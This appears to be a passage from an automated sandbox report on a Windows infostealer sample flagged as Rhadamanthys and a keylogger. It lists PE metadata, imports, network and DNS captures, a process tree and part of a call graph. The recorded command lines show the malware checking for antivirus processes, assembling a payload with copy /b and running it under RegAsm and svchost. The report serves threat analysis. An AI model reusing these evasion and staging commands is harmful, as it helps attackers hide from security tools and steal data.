                                                                                                  jmp 00007F12FCAE857Bh
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebx
                                                                                                  mov eax, dword ptr [esp+14h]
                                                                                                  or eax, eax
                                                                                                  jne 00007F12FCAE85AAh
                                                                                                  mov ecx, dword ptr [esp+10h]
                                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                                  xor edx, edx
                                                                                                  div ecx
                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                  div ecx
                                                                                                  mov eax, edx
                                                                                                  Programming Language:
                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x50127c0x118.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5040000x1348.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5060000x5efc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x500d580x54.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x500dc00x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x500c980x40.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xf30000x268.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000xf178c0xf1800eda1bc8b0fa74964196fd3305d6369a8False0.5134595788043478data6.349602427102444IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0xf30000x40f1b20x40f200b9d2bf95673d6c4f4c639ba7943255b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x5030000x5980x2008e868bf42833315384ca18ea2e1d9613False0.19140625data1.1470739081280514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x5040000x13480x14000ccc6e0c8d42692a75266b30d26a16ddFalse0.462109375data4.756605131387613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x5060000x5efc0x60008483a6f3b96d36a3101a9234b398cb02False0.7706705729166666data6.687792745680121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0x5042880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4800656660412758
                                                                                                  RT_GROUP_ICON0x5053300x14dataEnglishUnited States1.1
                                                                                                  RT_VERSION0x5040f00x194OpenPGP Secret KeyEnglishUnited States0.5371287128712872
                                                                                                  DLLImport
                                                                                                  api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressSingle, WakeByAddressAll
                                                                                                  bcryptprimitives.dllProcessPrng
                                                                                                  kernel32.dllUnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetTempPathW, SetHandleInformation, GetEnvironmentVariableW, FormatMessageW, GetCurrentProcessId, GetProcAddress, SetUnhandledExceptionFilter, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, WaitForSingleObject, IsProcessorFeaturePresent, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, CreateNamedPipeW, CreateThread, SleepEx, ReadFileEx, SetFileInformationByHandle, GetModuleHandleW, WaitForMultipleObjects, GetOverlappedResult, GetExitCodeProcess, ReadFile, CancelIo, HeapAlloc, GetProcessHeap, GetConsoleMode, GetStdHandle, CreateFileW, GetSystemInfo, HeapReAlloc, GetCurrentThread, CreateWaitableTimerExW, SetWaitableTimer, Sleep, SetThreadStackGuarantee, GetFileInformationByHandleEx, AddVectoredExceptionHandler, GetComputerNameExW, GetTimeZoneInformationForYear, GetSystemTimePreciseAsFileTime, SetFileAttributesW, CopyFileExW, CreateSymbolicLinkW, DeleteFileW, FindClose, FindNextFileW, FindFirstFileW, GetCurrentDirectoryW, SetLastError, GetFileInformationByHandle, CloseHandle, SwitchToThread, QueryPerformanceFrequency, QueryPerformanceCounter, GetLastError, HeapFree, CreateEventW, GetFullPathNameW, WriteFileEx, GetModuleFileNameW, TerminateProcess
                                                                                                  bcrypt.dllBCryptGenRandom
                                                                                                  advapi32.dllSystemFunction036, GetUserNameW
                                                                                                  ntdll.dllRtlNtStatusToDosError, NtReadFile, NtWriteFile
                                                                                                  ws2_32.dlllisten, bind, connect, getpeername, getsockname, WSASend, send, WSARecv, select, setsockopt, WSADuplicateSocketW, getsockopt, closesocket, WSASocketW, freeaddrinfo, WSACleanup, WSAStartup, WSAGetLastError, getaddrinfo, accept, ioctlsocket, recv
                                                                                                  VCRUNTIME140.dllmemcmp, _except_handler4_common, __current_exception_context, __current_exception, memcpy, memmove, memset
                                                                                                  api-ms-win-crt-runtime-l1-1-0.dll_initterm_e, exit, __p___argv, _initialize_narrow_environment, _cexit, _exit, _configure_narrow_argv, _register_thread_local_exe_atexit_callback, _initterm, _set_app_type, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _controlfp_s, terminate, _get_initial_narrow_environment, _c_exit, _seh_filter_exe, __p___argc
                                                                                                  api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                  api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                                                                                                  api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                                                  api-ms-win-crt-heap-l1-1-0.dll_set_new_mode
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 9, 2024 10:34:11.114010096 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:11.114042044 CET44349704185.166.143.50192.168.2.10
                                                                                                  Dec 9, 2024 10:34:11.114113092 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:11.115187883 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:11.115200996 CET44349704185.166.143.50192.168.2.10
                                                                                                  Dec 9, 2024 10:34:12.504581928 CET44349704185.166.143.50192.168.2.10
                                                                                                  Dec 9, 2024 10:34:12.539263010 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:12.539273977 CET44349704185.166.143.50192.168.2.10
                                                                                                  Dec 9, 2024 10:34:12.540837049 CET44349704185.166.143.50192.168.2.10
                                                                                                  Dec 9, 2024 10:34:12.540899992 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:12.548413992 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:12.548455000 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:12.548640013 CET44349704185.166.143.50192.168.2.10
                                                                                                  Dec 9, 2024 10:34:12.548713923 CET49704443192.168.2.10185.166.143.50
                                                                                                  Dec 9, 2024 10:34:12.780576944 CET49706443192.168.2.10104.26.8.44
                                                                                                  Dec 9, 2024 10:34:12.780630112 CET44349706104.26.8.44192.168.2.10
                                                                                                  Dec 9, 2024 10:34:12.780688047 CET49706443192.168.2.10104.26.8.44
                                                                                                  Dec 9, 2024 10:34:12.780936956 CET49706443192.168.2.10104.26.8.44
                                                                                                  Dec 9, 2024 10:34:12.780949116 CET44349706104.26.8.44192.168.2.10
                                                                                                  Dec 9, 2024 10:34:14.310580015 CET44349706104.26.8.44192.168.2.10
                                                                                                  Dec 9, 2024 10:34:14.311081886 CET49706443192.168.2.10104.26.8.44
                                                                                                  Dec 9, 2024 10:34:14.311115980 CET44349706104.26.8.44192.168.2.10
                                                                                                  Dec 9, 2024 10:34:14.312319994 CET44349706104.26.8.44192.168.2.10
                                                                                                  Dec 9, 2024 10:34:14.312387943 CET49706443192.168.2.10104.26.8.44
                                                                                                  Dec 9, 2024 10:34:14.313183069 CET49706443192.168.2.10104.26.8.44
                                                                                                  Dec 9, 2024 10:34:14.313220978 CET49706443192.168.2.10104.26.8.44
                                                                                                  Dec 9, 2024 10:34:14.313354969 CET44349706104.26.8.44192.168.2.10
                                                                                                  Dec 9, 2024 10:34:14.313410997 CET49706443192.168.2.10104.26.8.44
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 9, 2024 10:34:10.973004103 CET6097453192.168.2.101.1.1.1
                                                                                                  Dec 9, 2024 10:34:11.110903025 CET53609741.1.1.1192.168.2.10
                                                                                                  Dec 9, 2024 10:34:12.557459116 CET6143653192.168.2.101.1.1.1
                                                                                                  Dec 9, 2024 10:34:12.710225105 CET53614361.1.1.1192.168.2.10
                                                                                                  Dec 9, 2024 10:34:21.655725956 CET5137053192.168.2.101.1.1.1
                                                                                                  Dec 9, 2024 10:34:21.892956972 CET53513701.1.1.1192.168.2.10
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 9, 2024 10:34:10.973004103 CET192.168.2.101.1.1.10xe1adStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:12.557459116 CET192.168.2.101.1.1.10x6612Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:21.655725956 CET192.168.2.101.1.1.10x7eeeStandard query (0)edMKDlxnNIzWufljfi.edMKDlxnNIzWufljfiA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 9, 2024 10:34:11.110903025 CET1.1.1.1192.168.2.100xe1adNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:11.110903025 CET1.1.1.1192.168.2.100xe1adNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:11.110903025 CET1.1.1.1192.168.2.100xe1adNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:12.710225105 CET1.1.1.1192.168.2.100x6612No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:12.710225105 CET1.1.1.1192.168.2.100x6612No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:12.710225105 CET1.1.1.1192.168.2.100x6612No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                                  Dec 9, 2024 10:34:21.892956972 CET1.1.1.1192.168.2.100x7eeeName error (3)edMKDlxnNIzWufljfi.edMKDlxnNIzWufljfinonenoneA (IP address)IN (0x0001)false

                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:04:34:09
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Users\user\Desktop\PQwHxAiBGt.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\PQwHxAiBGt.exe"
                                                                                                  Imagebase:0x510000
                                                                                                  File size:5'276'672 bytes
                                                                                                  MD5 hash:2F0B358D17FFAF3D1F36EB992003FC68
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:04:34:13
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\setup.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\setup.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2'120'260 bytes
                                                                                                  MD5 hash:9DEF78C3562D533C530706BA4A2D1277
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 5%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:04:34:13
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'768'792 bytes
                                                                                                  MD5 hash:9E17536C65B31B33BE6F5840E3945407
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:04:34:14
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp" /SL5="$104AA,1145856,1145856,C:\Users\user\AppData\Local\Temp\setup.exe"
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:3'102'720 bytes
                                                                                                  MD5 hash:DD78675858275301D48256D22D52CA74
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:04:34:16
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmd
                                                                                                  Imagebase:0xd70000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:04:34:16
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff620390000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:04:34:18
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:tasklist
                                                                                                  Imagebase:0x8c0000
                                                                                                  File size:79'360 bytes
                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:04:34:18
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:findstr /I "wrsa opssvc"
                                                                                                  Imagebase:0xe80000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:04:34:19
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:tasklist
                                                                                                  Imagebase:0x8c0000
                                                                                                  File size:79'360 bytes
                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:04:34:19
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                  Imagebase:0xe80000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:04:34:19
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd /c md 422648
                                                                                                  Imagebase:0xd70000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:04:34:19
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd /c copy /b ..\Total + ..\Jones + ..\Handed + ..\Norwegian + ..\Beef + ..\Cu + ..\Biology + ..\Busy + ..\Bahamas + ..\Invoice + ..\Practices + ..\Atm + ..\Particularly + ..\Ongoing + ..\Lane + ..\False + ..\Huge B
                                                                                                  Imagebase:0xd70000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:04:34:20
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\422648\Ai.com
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:Ai.com B
                                                                                                  Imagebase:0x5f0000
                                                                                                  File size:947'288 bytes
                                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:04:34:20
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:choice /d y /t 5
                                                                                                  Imagebase:0x380000
                                                                                                  File size:28'160 bytes
                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:16
                                                                                                  Start time:04:34:45
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe
                                                                                                  Imagebase:0xc0000
                                                                                                  File size:65'440 bytes
                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Has exited:true

                                                                                                  Target ID:17
                                                                                                  Start time:04:34:45
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe
                                                                                                  Imagebase:0x2c0000
                                                                                                  File size:65'440 bytes
                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000002.1707925431.0000000004E60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:04:34:51
                                                                                                  Start date:09/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                  Imagebase:0x890000
                                                                                                  File size:46'504 bytes
                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000003.1704529751.0000000005200000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000012.00000003.1702400594.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000012.00000002.1713875821.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:21.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:10%
                                                                                                    Total number of Nodes:10
                                                                                                    Total number of Limit Nodes:1

                                                                                                    Callgraph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Opacity -> Relevance
                                                                                                    • Disassembly available
                                                                                                    callgraph 0 Function_005FC946 3 Function_005FCD52 0->3 1 Function_005ABA90 2 Function_005FCD05 3->2

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetThreadStackGuarantee.KERNEL32 ref: 005ABAA2
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 005ABACC
                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 005ABADB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1468934917.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1468914842.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1469017951.0000000000603000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1469017951.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1469368223.0000000000A13000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1469387904.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_510000_PQwHxAiBGt.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap$GuaranteeStackThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 707462487-0
                                                                                                    • Opcode ID: 7b82281ac1a79cf28381bb92c362d92504cacb4e743a793c5c7cdb080937c135
                                                                                                    • Instruction ID: d97e77270fba91906d1a530987a83c7a16b3897d1c6c8aedc20cede0a55f3af3
                                                                                                    • Opcode Fuzzy Hash: 7b82281ac1a79cf28381bb92c362d92504cacb4e743a793c5c7cdb080937c135
                                                                                                    • Instruction Fuzzy Hash: 31F0B476100200ABDB209F44DC4CF4BBFA9FF4D712F188028F50597251D375A914CBB5

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:18.2%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:21.4%
                                                                                                    Total number of Nodes:1474
                                                                                                    Total number of Limit Nodes:33
                                                                                                    execution_graph 4264 402fc0 4265 401446 18 API calls 4264->4265 4266 402fc7 4265->4266 4267 403017 4266->4267 4268 40300a 4266->4268 4271 401a13 4266->4271 4269 406805 18 API calls 4267->4269 4270 401446 18 API calls 4268->4270 4269->4271 4270->4271 4272 4023c1 4273 40145c 18 API calls 4272->4273 4274 4023c8 4273->4274 4277 40726a 4274->4277 4280 406ed2 CreateFileW 4277->4280 4281 406f04 4280->4281 4282 406f1e ReadFile 4280->4282 4283 4062a3 11 API calls 4281->4283 4284 4023d6 4282->4284 4287 406f84 4282->4287 4283->4284 4285 4071e3 CloseHandle 4285->4284 4286 406f9b ReadFile lstrcpynA lstrcmpA 4286->4287 4288 406fe2 SetFilePointer ReadFile 4286->4288 4287->4284 4287->4285 4287->4286 4291 406fdd 4287->4291 4288->4285 4289 4070a8 ReadFile 4288->4289 4290 407138 4289->4290 4290->4289 4290->4291 4292 40715f SetFilePointer GlobalAlloc ReadFile 4290->4292 4291->4285 4293 4071a3 4292->4293 4294 4071bf lstrcpynW GlobalFree 4292->4294 4293->4293 4293->4294 4294->4285 4295 401cc3 4296 40145c 18 API calls 4295->4296 4297 401cca lstrlenW 4296->4297 4298 4030dc 4297->4298 4299 4030e3 4298->4299 4301 405f51 wsprintfW 4298->4301 4301->4299 4316 401c46 4317 40145c 18 API calls 4316->4317 4318 401c4c 4317->4318 4319 4062a3 11 API calls 4318->4319 4320 401c59 4319->4320 4321 406c9b 81 API calls 4320->4321 4322 401c64 4321->4322 4323 4030c7 InvalidateRect 4324 4030e3 4323->4324 4325 403049 4326 401446 18 API calls 4325->4326 4329 403050 4326->4329 4327 406805 18 API calls 4328 401a13 4327->4328 4329->4327 4329->4328 4330 40204a 4331 401446 18 API calls 4330->4331 4332 402051 IsWindow 4331->4332 4333 4018d3 4332->4333 4334 40324c 4335 403277 4334->4335 4336 40325e SetTimer 4334->4336 4337 4032cc 4335->4337 4338 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4335->4338 4336->4335 4338->4337 4339 4048cc 4340 4048f1 4339->4340 4341 4048da 4339->4341 4343 4048ff IsWindowVisible 4340->4343 4344 404916 4340->4344 4342 4048e0 4341->4342 4357 40495a 4341->4357 4345 403daf SendMessageW 4342->4345 4347 40490c 4343->4347 4343->4357 4346 404960 CallWindowProcW 4344->4346 4363 406009 lstrcpynW 4344->4363 4348 4048ea 4345->4348 4346->4348 4358 40484e SendMessageW 4347->4358 4351 404945 4364 405f51 wsprintfW 4351->4364 4353 40494c 4354 40141d 80 API calls 4353->4354 4355 404953 4354->4355 4365 406009 lstrcpynW 4355->4365 4357->4346 4359 404871 GetMessagePos ScreenToClient SendMessageW 4358->4359 4360 4048ab SendMessageW 4358->4360 4361 4048a3 4359->4361 4362 4048a8 4359->4362 4360->4361 4361->4344 4362->4360 4363->4351 4364->4353 4365->4357 4366 4022cc 4367 40145c 18 API calls 4366->4367 4368 4022d3 4367->4368 4369 4062d5 2 API calls 4368->4369 4370 4022d9 4369->4370 4371 4022e8 4370->4371 4375 405f51 wsprintfW 4370->4375 4374 4030e3 4371->4374 4376 405f51 wsprintfW 4371->4376 4375->4371 4376->4374 4149 4050cd 4150 405295 4149->4150 4151 4050ee GetDlgItem GetDlgItem GetDlgItem 4149->4151 4152 